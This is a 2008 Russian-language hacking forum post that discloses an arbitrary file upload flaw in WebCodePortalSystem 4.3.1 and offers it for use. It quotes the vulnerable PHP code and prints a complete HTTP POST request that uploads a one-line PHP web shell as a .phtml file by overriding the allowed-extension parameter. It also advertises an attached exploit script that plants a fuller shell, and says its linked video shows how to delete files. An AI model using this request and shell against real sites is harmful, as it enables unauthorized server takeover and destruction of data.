09.05.2008, 00:33
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
WebCodePortalSystem v. 4.3.1 Льём шелл! (видео) + возможность удалять файлы
Требуется что бы: регистер глобалс = офф
Уязвимость в файле mod/user/_upl.php, вот уязвимый кусок кода:
PHP код:
if(empty($wcpsval['tip_loadimages'])){ $tip_loadimages="jpg|gif|png"; }
else { $tip_loadimages=$wcpsval['tip_loadimages']; }
Занятно то что $wcpsval['tip_loadimages'] мы более чем спокойно можем изменить, т.е. самим указать разрешенные расширения файлов, что даёт нам возможность закачивать любые файлы.
Я отснифал пакет с отправкой файла, получилось что то вроде этого:
Код:
POST /ajax.php?nma=user&fla=_upl&t=1210069192453&JsHttpRequest=12100691924532-form HTTP/1.0
User-Agent: Opera/9.23 (Windows NT 5.1; U; ru)
Host: хост
Referer: http://хост/index.php?nma=user&fla=accaunt
Cookie: куки
Cookie2: $Version=1
Connection: close
Content-Length: 192
Content-Type: multipart/form-data; boundary=----------UEffLig9vPkZpftUKEtdJW
------------UEffLig9vPkZpftUKEtdJW
Content-Disposition: form-data; name="q"; filename="img.phtml"
Content-Type: text/plain
<?php eval($_GET['e']); ?>
------------UEffLig9vPkZpftUKEtdJW--
Теперь поменяем первую строчку на такую:
Код:
POST /ajax.php?nma=user&fla=_upl&wcpsval[tip_loadimages]=phtml&t=1210069192453&JsHttpRequest=12100691924532-form HTTP/1.0
Теперь расширение phtml более чем правильное =)
Для удобства я написал сплоент - всё что нужно указать это куки и хост (все что делает сплоент это отправляет пакет, результат нужно смотреть самим, хоть он и пишет что шелл залит, но это может быть не так).
Подробное видео смотреть тут (размер около 4 метров):
http://video.antichat.ru/file267.html
В аттаче архив в котором Улучшенная версия сплойта (льёт более функциональный шелл) по сравнению с тем что в архиве с видео и чуть подправленное описание.
P.S. Т.к. залить файл с расширением .php нельзя из-за .htaccess который блочит пхп файлы, заливать шелл нужно в файл .phtml, но не на каждом серваке такие файлы будут обрабатываться.
P.P.S. Про удаление файлов - в видео.
Последний раз редактировалось Grey; 09.05.2008 в 01:28..
|
|
|